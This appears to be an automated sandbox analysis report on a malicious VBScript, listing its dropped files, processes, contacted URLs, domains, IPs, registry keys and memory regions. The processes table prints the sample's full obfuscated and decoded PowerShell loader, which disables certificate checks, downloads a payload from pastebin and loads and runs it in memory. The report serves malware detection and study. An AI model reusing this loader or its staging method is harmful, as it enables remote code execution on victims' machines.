Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sostener.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5401mkhr.tdx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmebbsrg.imj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl2fhn1w.ogp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3dk4bsm.mco.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?HU?YwBs?HI?I??9?C??Jw?w?Cc?Ow?k?GM?ZQB1?G8?cw?g?D0?I??n?CU?c?B6?EE?YwBP?Gc?SQBu?E0?cg?l?Cc?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBy?HY?ZQBy?EM?ZQBy?HQ?aQBm?Gk?YwBh?HQ?ZQBW?GE?b?Bp?GQ?YQB0?Gk?bwBu?EM?YQBs?Gw?YgBh?GM?aw?g?D0?I?B7?CQ?d?By?HU?ZQB9?Ds?WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?OwBb?EI?eQB0?GU?WwBd?F0?I??k?HU?awBs?Gk?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??o?E4?ZQB3?C0?TwBi?Go?ZQBj?HQ?I?BO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?Ck?LgBE?G8?dwBu?Gw?bwBh?GQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?Cc?a?B0?HQ?c??6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Vg?5?Hk?NQBR?DU?dgB2?Cc?KQ?g?Ck?I??p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?B1?Gs?b?Bp?GI?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?Fg?dQBN?E4?dQBU?Gg?aQ?v?Hc?YQBy?C8?bQBv?GM?LgBu?Gk?YgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bj?GU?dQBv?HM?I??s?C??JwBf?F8?XwBJ?G4?dgBp?GM?d?B1?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bh?HU?YwBs?HI?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL
= $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$auclr = '0';$ceuos = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback
= {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uklib =
[system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv')
) );[system.AppDomain]::CurrentDomain.Load($uklib).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]]
('XuMNuThi/war/moc.nibetsap//:sptth' , $ceuos , '___Invictus_________________________________________-------', $auclr, '1',
'Roda' ));"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/2TIoM/0
|
188.114.97.3
|
|
|
|
http://pastebin.com
|
unknown
|
|
|
|
http://pastebin.com/raw/V9y5Q5vv
|
104.20.3.235
|
|
|
|
https://pastebin.com/raw/sFgsbG3v
|
104.20.3.235
|
||
|
https://pastebin.com/raw
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/a859e2fb-0347-
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://s3-w.us-east-1.amazonaws.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bitbucket.org
|
unknown
|
||
|
http://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
HTTPS://PASTEBIN.COM/RAW/IHTUNMUX
|
unknown
|
||
|
https://paste.ee/d/2TIoM/0P
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://bbuseruploads.s3.amazoh
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://bitbucket.org
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://pastebin.com/raw/ihTuNMuX
|
104.20.3.235
|
||
|
https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dll.txt
|
185.166.143.50
|
||
|
https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dll.txtP
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
http://pastebin.com/raw/v9y5q5vv
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://pastebin.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://pastebin.com/raw/V9y5Q5vv
|
104.20.3.235
|
There are 40 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
michael2009nj.duckdns.org
|
186.169.89.218
|
|
|
|
pastebin.com
|
104.20.3.235
|
|
|
|
bbuseruploads.s3.amazonaws.com
|
unknown
|
|
|
|
s3-w.us-east-1.amazonaws.com
|
3.5.29.207
|
||
|
bitbucket.org
|
185.166.143.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.20.3.235
|
pastebin.com
|
United States
|
|
|
|
186.169.89.218
|
michael2009nj.duckdns.org
|
Colombia
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
3.5.29.207
|
s3-w.us-east-1.amazonaws.com
|
United States
|
||
|
185.166.143.50
|
bitbucket.org
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER
|
di
|
||
|
HKEY_CURRENT_USER\SOFTWARE\bf4e531b630e4de6ab2
|
[kl]
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
182C85ED000
|
trusted library allocation
|
page read and write
|
|
|
|
2E15000
|
trusted library allocation
|
page read and write
|
|
|
|
182E0440000
|
trusted library section
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
CF68FEA000
|
stack
|
page read and write
|
||
|
528DEFD000
|
stack
|
page read and write
|
||
|
182C854E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
182C83BA000
|
trusted library allocation
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
182C9742000
|
trusted library allocation
|
page read and write
|
||
|
CF69AFF000
|
stack
|
page read and write
|
||
|
528E1B8000
|
stack
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
A5FDF7D000
|
stack
|
page read and write
|
||
|
182C854C000
|
trusted library allocation
|
page read and write
|
||
|
5599000
|
stack
|
page read and write
|
||
|
24FC7340000
|
trusted library allocation
|
page read and write
|
||
|
24FDFAD0000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAC0000
|
trusted library allocation
|
page read and write
|
||
|
54B7000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
564E000
|
stack
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
2C26000
|
trusted library allocation
|
page execute and read and write
|
||
|
A5FDFFF000
|
stack
|
page read and write
|
||
|
24FC5AD0000
|
heap
|
page read and write
|
||
|
7FFAACB6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB96000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FC7DD0000
|
trusted library allocation
|
page read and write
|
||
|
2B934399000
|
heap
|
page read and write
|
||
|
24FC5A30000
|
heap
|
page read and write
|
||
|
182C6270000
|
heap
|
page read and write
|
||
|
182C858A000
|
trusted library allocation
|
page read and write
|
||
|
5352000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page read and write
|
||
|
2B9341F1000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
55DE000
|
stack
|
page read and write
|
||
|
7FFAACA83000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB66000
|
trusted library allocation
|
page read and write
|
||
|
182D81A2000
|
trusted library allocation
|
page read and write
|
||
|
5380000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
2B93454D000
|
heap
|
page read and write
|
||
|
182E0340000
|
heap
|
page read and write
|
||
|
528DB6E000
|
stack
|
page read and write
|
||
|
7FFAACCF0000
|
trusted library allocation
|
page read and write
|
||
|
535A000
|
trusted library allocation
|
page read and write
|
||
|
5372000
|
trusted library allocation
|
page read and write
|
||
|
24FC5A98000
|
heap
|
page read and write
|
||
|
182C9BA7000
|
trusted library allocation
|
page read and write
|
||
|
24FC7DE4000
|
trusted library allocation
|
page read and write
|
||
|
E3A000
|
stack
|
page read and write
|
||
|
53B0000
|
trusted library allocation
|
page read and write
|
||
|
5390000
|
trusted library allocation
|
page read and write
|
||
|
24FC789F000
|
trusted library allocation
|
page read and write
|
||
|
528EF8D000
|
stack
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
2B9321A1000
|
heap
|
page read and write
|
||
|
594E000
|
stack
|
page read and write
|
||
|
24FC78B0000
|
trusted library allocation
|
page read and write
|
||
|
182C8437000
|
trusted library allocation
|
page read and write
|
||
|
A5FE53E000
|
stack
|
page read and write
|
||
|
24FC78AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
182C843F000
|
trusted library allocation
|
page read and write
|
||
|
24FD77A0000
|
trusted library allocation
|
page read and write
|
||
|
2B9321A7000
|
heap
|
page read and write
|
||
|
7FFAACC52000
|
trusted library allocation
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
1214000
|
trusted library allocation
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
5346000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
24FDF9B0000
|
heap
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
528E53B000
|
stack
|
page read and write
|
||
|
2B9323C0000
|
heap
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
182C62B0000
|
heap
|
page read and write
|
||
|
7FFB1DDE0000
|
unkown
|
page readonly
|
||
|
182C633D000
|
heap
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B93454D000
|
heap
|
page read and write
|
||
|
24FC7791000
|
trusted library allocation
|
page read and write
|
||
|
182C6670000
|
trusted library allocation
|
page read and write
|
||
|
182C8635000
|
trusted library allocation
|
page read and write
|
||
|
A5FDEFE000
|
stack
|
page read and write
|
||
|
12F0000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
2C2A000
|
trusted library allocation
|
page execute and read and write
|
||
|
182E0358000
|
heap
|
page read and write
|
||
|
54B0000
|
trusted library allocation
|
page read and write
|
||
|
A5FE0FF000
|
stack
|
page read and write
|
||
|
182C8073000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
24FC58F0000
|
heap
|
page read and write
|
||
|
2C32000
|
trusted library allocation
|
page read and write
|
||
|
24FC5D25000
|
heap
|
page read and write
|
||
|
528DE7F000
|
stack
|
page read and write
|
||
|
24FC77B0000
|
trusted library allocation
|
page read and write
|
||
|
5366000
|
trusted library allocation
|
page read and write
|
||
|
2B934889000
|
heap
|
page read and write
|
||
|
4FAD000
|
stack
|
page read and write
|
||
|
182C6341000
|
heap
|
page read and write
|
||
|
5361000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC65000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB66000
|
trusted library allocation
|
page execute and read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
|
2B93219E000
|
heap
|
page read and write
|
||
|
24FC73E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page read and write
|
||
|
A5FE177000
|
stack
|
page read and write
|
||
|
F38000
|
stack
|
page read and write
|
||
|
2B932470000
|
heap
|
page read and write
|
||
|
7FFAACC62000
|
trusted library allocation
|
page read and write
|
||
|
2B932140000
|
heap
|
page read and write
|
||
|
A5FDB5E000
|
stack
|
page read and write
|
||
|
182C965F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1DDE1000
|
unkown
|
page execute read
|
||
|
24FC5B8C000
|
heap
|
page read and write
|
||
|
7023D000
|
unkown
|
page read and write
|
||
|
182C8222000
|
trusted library allocation
|
page read and write
|
||
|
12FF000
|
heap
|
page read and write
|
||
|
182E07F0000
|
heap
|
page read and write
|
||
|
2B932214000
|
heap
|
page read and write
|
||
|
24FDF9A0000
|
heap
|
page execute and read and write
|
||
|
182C96A0000
|
trusted library allocation
|
page read and write
|
||
|
182E0460000
|
heap
|
page execute and read and write
|
||
|
1050000
|
heap
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
1284000
|
heap
|
page read and write
|
||
|
182C9710000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC31000
|
trusted library allocation
|
page read and write
|
||
|
24FC5ADA000
|
heap
|
page read and write
|
||
|
24FC7444000
|
heap
|
page read and write
|
||
|
182C9687000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACABD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
A5FE1BE000
|
stack
|
page read and write
|
||
|
528E4BE000
|
stack
|
page read and write
|
||
|
182C6684000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
182C96B0000
|
trusted library allocation
|
page read and write
|
||
|
A5FE07E000
|
stack
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
7DF4492C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
182D8001000
|
trusted library allocation
|
page read and write
|
||
|
182C971D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA9B000
|
trusted library allocation
|
page read and write
|
||
|
6300000
|
heap
|
page read and write
|
||
|
A5FDBDE000
|
stack
|
page read and write
|
||
|
182E0490000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
5792000
|
heap
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
182D81DD000
|
trusted library allocation
|
page read and write
|
||
|
182C8627000
|
trusted library allocation
|
page read and write
|
||
|
182C7CE0000
|
trusted library allocation
|
page read and write
|
||
|
24FD7803000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
528DF7F000
|
stack
|
page read and write
|
||
|
182C968F000
|
trusted library allocation
|
page read and write
|
||
|
70221000
|
unkown
|
page execute read
|
||
|
182C9035000
|
trusted library allocation
|
page read and write
|
||
|
5310000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
2B932179000
|
heap
|
page read and write
|
||
|
54D3000
|
heap
|
page read and write
|
||
|
54D0000
|
heap
|
page read and write
|
||
|
12EC000
|
heap
|
page read and write
|
||
|
3E11000
|
trusted library allocation
|
page read and write
|
||
|
1278000
|
heap
|
page read and write
|
||
|
2B9321C8000
|
heap
|
page read and write
|
||
|
7FFAACB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
A5FDE7E000
|
stack
|
page read and write
|
||
|
2B9321A8000
|
heap
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page read and write
|
||
|
24FDF9EF000
|
heap
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
|
2B9321E4000
|
heap
|
page read and write
|
||
|
182D81C3000
|
trusted library allocation
|
page read and write
|
||
|
182E05DF000
|
heap
|
page read and write
|
||
|
182C8597000
|
trusted library allocation
|
page read and write
|
||
|
182C8576000
|
trusted library allocation
|
page read and write
|
||
|
3E19000
|
trusted library allocation
|
page read and write
|
||
|
24FDFAB0000
|
heap
|
page read and write
|
||
|
182C96D9000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
remote allocation
|
page execute and read and write
|
||
|
5340000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
528E238000
|
stack
|
page read and write
|
||
|
7FFAACC3A000
|
trusted library allocation
|
page read and write
|
||
|
CF69BFB000
|
stack
|
page read and write
|
||
|
7FFAACAB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
CF699FE000
|
stack
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
528E3BE000
|
stack
|
page read and write
|
||
|
24FC5B84000
|
heap
|
page read and write
|
||
|
24FC797C000
|
trusted library allocation
|
page read and write
|
||
|
2B932225000
|
heap
|
page read and write
|
||
|
182C967F000
|
trusted library allocation
|
page read and write
|
||
|
528EF0E000
|
stack
|
page read and write
|
||
|
2B932475000
|
heap
|
page read and write
|
||
|
24FD7791000
|
trusted library allocation
|
page read and write
|
||
|
182E05BC000
|
heap
|
page read and write
|
||
|
182C9648000
|
trusted library allocation
|
page read and write
|
||
|
182C7E50000
|
heap
|
page execute and read and write
|
||
|
24FC5AD6000
|
heap
|
page read and write
|
||
|
24FC782D000
|
trusted library allocation
|
page read and write
|
||
|
1213000
|
trusted library allocation
|
page execute and read and write
|
||
|
1313000
|
heap
|
page read and write
|
||
|
182C968B000
|
trusted library allocation
|
page read and write
|
||
|
53A0000
|
trusted library allocation
|
page read and write
|
||
|
182C83EA000
|
trusted library allocation
|
page read and write
|
||
|
70220000
|
unkown
|
page readonly
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
24FC59F0000
|
heap
|
page read and write
|
||
|
182C7CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page read and write
|
||
|
182D81C8000
|
trusted library allocation
|
page read and write
|
||
|
24FC7899000
|
trusted library allocation
|
page read and write
|
||
|
55E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CF695FE000
|
stack
|
page read and write
|
||
|
24FC7CD6000
|
trusted library allocation
|
page read and write
|
||
|
2B93454F000
|
heap
|
page read and write
|
||
|
182C8001000
|
trusted library allocation
|
page read and write
|
||
|
613E000
|
stack
|
page read and write
|
||
|
24FC7800000
|
trusted library allocation
|
page read and write
|
||
|
2B93219D000
|
heap
|
page read and write
|
||
|
7FFB1DE00000
|
unkown
|
page read and write
|
||
|
A5FE2BC000
|
stack
|
page read and write
|
||
|
2B9321CA000
|
heap
|
page read and write
|
||
|
2B93439C000
|
heap
|
page read and write
|
||
|
24FC78B3000
|
trusted library allocation
|
page read and write
|
||
|
24FC5AB0000
|
heap
|
page read and write
|
||
|
7FFB1DDF6000
|
unkown
|
page readonly
|
||
|
5750000
|
heap
|
page read and write
|
||
|
1281000
|
heap
|
page read and write
|
||
|
24FDFBF5000
|
heap
|
page read and write
|
||
|
549C000
|
stack
|
page read and write
|
||
|
182C7E80000
|
heap
|
page read and write
|
||
|
182C8550000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A70000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
1203000
|
trusted library allocation
|
page read and write
|
||
|
2B932150000
|
heap
|
page read and write
|
||
|
124B000
|
heap
|
page read and write
|
||
|
182C967C000
|
trusted library allocation
|
page read and write
|
||
|
2B9321A1000
|
heap
|
page read and write
|
||
|
182D81B3000
|
trusted library allocation
|
page read and write
|
||
|
182C7E9A000
|
heap
|
page read and write
|
||
|
2C50000
|
trusted library allocation
|
page read and write
|
||
|
182C9718000
|
trusted library allocation
|
page read and write
|
||
|
535E000
|
trusted library allocation
|
page read and write
|
||
|
182C996D000
|
trusted library allocation
|
page read and write
|
||
|
182D8074000
|
trusted library allocation
|
page read and write
|
||
|
24FC5A90000
|
heap
|
page read and write
|
||
|
24FC7360000
|
heap
|
page execute and read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC61000
|
trusted library allocation
|
page read and write
|
||
|
A5FE237000
|
stack
|
page read and write
|
||
|
24FDFA18000
|
heap
|
page read and write
|
||
|
24FC78B6000
|
trusted library allocation
|
page read and write
|
||
|
24FC5A70000
|
trusted library allocation
|
page read and write
|
||
|
A5FE339000
|
stack
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
182D82FD000
|
trusted library allocation
|
page read and write
|
||
|
24FC5AD4000
|
heap
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
182C6300000
|
heap
|
page read and write
|
||
|
12E2000
|
heap
|
page read and write
|
||
|
182E03DA000
|
heap
|
page read and write
|
||
|
182C6386000
|
heap
|
page read and write
|
||
|
534B000
|
trusted library allocation
|
page read and write
|
||
|
12FB000
|
heap
|
page read and write
|
||
|
182C85D6000
|
trusted library allocation
|
page read and write
|
||
|
182C7DC0000
|
heap
|
page read and write
|
||
|
24FDFA8C000
|
heap
|
page read and write
|
||
|
182E059F000
|
heap
|
page read and write
|
||
|
2DFC000
|
stack
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page read and write
|
||
|
24FC59D0000
|
heap
|
page read and write
|
||
|
182C9643000
|
trusted library allocation
|
page read and write
|
||
|
182C62F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
24FDFBE0000
|
heap
|
page read and write
|
||
|
182C6250000
|
heap
|
page read and write
|
||
|
528DFFE000
|
stack
|
page read and write
|
||
|
528E13F000
|
stack
|
page read and write
|
||
|
24FC7350000
|
heap
|
page readonly
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
7FFB1DE02000
|
unkown
|
page readonly
|
||
|
2C37000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FC5AF0000
|
heap
|
page read and write
|
||
|
182C85E6000
|
trusted library allocation
|
page read and write
|
||
|
54B4000
|
